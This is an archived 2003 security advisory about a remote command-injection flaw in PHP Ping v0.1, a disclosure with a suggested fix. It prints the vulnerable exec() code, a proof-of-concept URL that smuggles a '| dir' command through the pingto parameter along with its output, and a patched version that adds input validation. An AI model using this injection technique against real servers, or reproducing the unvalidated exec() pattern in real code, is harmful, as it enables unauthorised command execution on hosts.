Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: sb6044.htm

PHP Ping Remote Command Execution



6th Mar 2003 [SBWID-6044]
COMMAND

	PHP Ping Remote Command Execution

SYSTEMS AFFECTED

	PHP Ping v0.1 and prior

PROBLEM

	Thanks to Grégory Le Bras  aka  GaLiaRePt  of  Security  Corporation  in
	security advisory [SCSA-009] :
	
	 http://www.security-corp.org/advisories/SCSA-009-FR.txt
	
	PHP ping  "will  allow  you,  provided  that  your  server  turns  under
	Windows, to realize a "ping" on the host of your choice."
	
	(direct quote from PHP Ping website)
	
	
	 DETAILS
	 ________________________________________________________________________
	
	A vulnerability have been found in PHP ping  which  allow  attackers  to
	execute remote command.
	
	This vulnerability would allow a remote attacker to compromise parts  of
	the operating system, possibly the complete operating system.
	
	Vulnerable code :
	
	<?
	//*************************************
	// FONCTION DU PING
	//*************************************
	function PHPing($cible,$pingFile){
	exec("ping -a -n 1 $cible >$pingFile", $list);
	$fd = fopen($pingFile, "r");
	while(!feof($fd))
	{
	$ping.= fgets($fd,256);
	}
	fclose($fd);
	return $ping;
	}
	//-------------------------------------
	?>
	
	
	 EXPLOIT
	 ________________________________________________________________________
	 
	The vulnerability was discovered in the  page  for  execute  "ping",  at
	this adress :
	
	http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir
	
	This exploit simply show the contents of the current repertory.
	
	c:\phpping
	
	03/03/2003  23:01       <DIR>          .
	03/03/2003  23:01       <DIR>          ..
	03/03/2003  23:00       <DIR>          img
	30/04/2002  23:13                3217 index.php
	30/04/2002  23:19                  921 README
	03/03/2003  23:03                    0 resultat.ping
	3 file(s)            4138 bytes
	3 Dir(s)  11413962752 bytes free
	

SOLUTION

	For example use this code :
	
	<?
	//*************************************
	// FONCTION DU PING
	//*************************************
	function PHPing($cible,$pingFile){
	
	# BugFix by Gregory LEBRAS www.security-corp.org
	
	if( (!$cible) ||
	(!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/i",$cible)) ){
	echo("Error: Please specify a valid target host or IP.");
	exit;
	}
	else
	{
	exec("ping -a -n 1 $cible >$pingFile", $list);
	$fd = fopen($pingFile, "r");
	while(!feof($fd))
	{
	$ping.= fgets($fd,256);
	}
	fclose($fd);
	return $ping;
	}
	}
	//------------------------------------
	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH